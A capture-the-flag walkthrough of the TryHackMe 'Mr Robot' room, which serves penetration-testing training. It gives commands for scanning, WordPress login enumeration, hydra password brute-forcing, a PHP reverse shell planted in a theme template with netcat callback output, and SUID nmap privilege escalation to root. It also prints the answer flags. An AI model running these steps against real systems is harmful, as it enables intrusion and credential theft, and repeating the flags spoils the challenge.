💀Mr Robot CTF

Based on the Mr. Robot show, can you root this box?

Mr Robot CTFTryHackMe

https://tryhackme.com/room/mrrobot

Room Attributes	Value
Subscription Required	False [Free]
Type	Challenges (CTF)
Difficulty	Medium
Tags	MrRobot, Root, Beginner

Video Walkthrough

TryHackMe Mr Robot Official Walkthrough

Task 1 - Connect to our network

Go to your access page and download your configuration file.

No answer needed

Use an OpenVPN client to connect. In my example I am on Linux, on the access page we have a windows tutorial.

No answer needed

You are now ready to use our machines on our network!

No answer needed

Now when you deploy material, you will see an internal IP address of your Virtual Machine.

No answer needed

Task 2 - Hack the machine

What is key 1?

Running nmap or rustscan against the target returns two open ports on port 80 and 443.

rustscan -b 1500 -a TARGET_IP --range 1-1000

PORT STATE SERVICE REASON 
80/tcp open http syn-ack
443/tcp open https syn-ack

HINT: Robots

Checking the robots.txt file shows two interesting files:

• fsocity.dic

• key-1-of-3.txt

robots.txt

key-1-of-3.txt contains the first flag:

Reveal Flag 🚩

🚩073403c8a58a1f80d943455fb30724b9

What is key 2?

Next run dirb, dirbuster, or gobuster against the target to find some interesting URLs:

gobuster dir -u http://TARGET_IP/ -w /usr/share/wordlists/dirb/common.txt

/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.121.252/0/]
/admin (Status: 301) [Size: 235] [--> http://10.10.121.252/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.121.252/feed/atom/]
/audio (Status: 301) [Size: 235] [--> http://10.10.121.252/audio/]
/blog (Status: 301) [Size: 234] [--> http://10.10.121.252/blog/]

/0 opened a wordpress blog. Going to the login screen http://TARGET_IP/wp-login.php shows the wordpress login screen. Entering the username 'admin' and the password 'admin' presents an error message:

ERROR: Invalid username.

This page can be used to enumerate valid usernames as when providing the username 'elliot' (the main character's name in Mr. Robot) the error states the password is wrong:

ERROR: The password you entered for the username elliot is incorrect.

Looking at fsocity.dic there are a number of duplicate entries so we can strip those out to optimise the wordlist:

sort fsocity.dic | uniq > fsocity-sorted.dic

We can then use wpscan, hydra, or burp suite intruder (slow) to brute force the password.

hydra -l 'elliot' -P Documents/THM/mrrobot/fsocity-sorted.dic TARGET_IP -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 16

You should find the password around the 5000th attempt.

Elliot's Password

ER28-0652

HINT: White coloured font

Once logged into wordpress as an admin we can check out the image gallery. One image has white text in the background which reveals another username and also their password:

hello friend

In order to turn our wordpress access into a shell we can edit the templates to add the PHP PenTestMonkey reverse shell pointing to your tun0 IP address into the 404.php template file:

Online - Reverse Shell Generatorwww.revshells.com

https://www.revshells.com/

Adding PHP PenTestMonkey reverse shell to the 404.php template file

Start a netcat listener on your machine then open the 404.php page in a browser to trigger the reverse shell.

listening on [any] 4444 ... 
connect to [10.9.12.198] from (UNKNOWN) [10.10.121.252] 37394 
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 19:03:27 up 46 min, 0 users, load average: 0.05, 0.06, 0.13 
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 
uid=1(daemon) gid=1(daemon) groups=1(daemon) 
bash: cannot set terminal process group (1998): Inappropriate ioctl for device 
bash: no job control in this shell 
daemon@linux:/$

With a shell we can extract the md5 hash from password.raw-md5 from the daemon /home/robot/ directory:

daemon@linux:/$ cd /home/robot 
daemon@linux:/home/robot$ ls
key-2-of-3.txt 
password.raw-md5 
daemon@linux:/home/robot$ cat password.raw-md5 
robot:c3fcd3d76192e4007dfb496cca67e13b

We can reverse the hash using crackstation:

CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.crackstation.net

https://crackstation.net/

Hash	Type	Result
c3fcd3d76192e4007dfb496cca67e13b	md5	(expand below)

robot User Password

abcdefghijklmnopqrstuvwxyz

Trying to cat key-2-of-3.txt we find that we don't have adequate permissions:

daemon@linux:/home/robot$ cat key-2-of-3.txt 
cat: key-2-of-3.txt: Permission denied

Trying to run su results in an error message saying we need to run it in a terminal

daemon@linux:/home/robot$ su robot
su: must be run from a terminal

To get past this we need to upgrade our shell to a TTY shell:

https://netsec.ws/?p=337netsec.ws

https://netsec.ws/?p=337

daemon@linux:/home/robot$ python -c 'import pty; pty.spawn("/bin/sh")'

$ su robot
Password: (expand above)

robot@linux:~$ cat key-2-of-3.txt
(reveal flag #2 below)

Reveal Flag 🚩

🚩822c73956184f694993bede3eb39f959

What is key 3?

HINT: nmap

The final flag is in the root directory so in order to reach that we need to privilege escalate our current shell. Searching the filesystem for files with the SUID bit set we find that nmap is installed and SUID is set:

robot@linux:~$ find / -perm /4000
/bin/ping 
/bin/umount 
/bin/mount 
/bin/ping6 
/bin/su 
find: /etc/ssl/private': Permission denied 
/usr/bin/passwd 
/usr/bin/newgrp 
/usr/bin/chsh 
/usr/bin/chfn 
/usr/bin/gpasswd 
/usr/bin/sudo 
/usr/local/bin/nmap 
/usr/lib/openssh/ssh-keysign 
/usr/lib/eject/dmcrypt-get-device 
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper 
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper 
/usr/lib/pt_chown

GTFOBins shows the steps to run nmap in interactive mode which you can abuse to run commands as root:

nmap | GTFOBinsgtfobins.github.io

https://gtfobins.github.io/gtfobins/nmap/

nmap --interactive
nmap> !sh

robot@linux:~$ nmap --interactive
nmap --interactive                                                                           
                                                                                             
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )                                      
Welcome to Interactive Mode -- press h <enter> for help                                      
nmap> !sh                                                                                    
!sh                                                                                          
#                                                                                            

With root shell we can access the root directory and obtain our final flag!

# cd /root
cd /root
# ls
ls
firstboot_done  key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
(reveal flag #3 below)

Reveal Flag 🚩

🚩04787ddef27c3dee1ee161b21670b4e4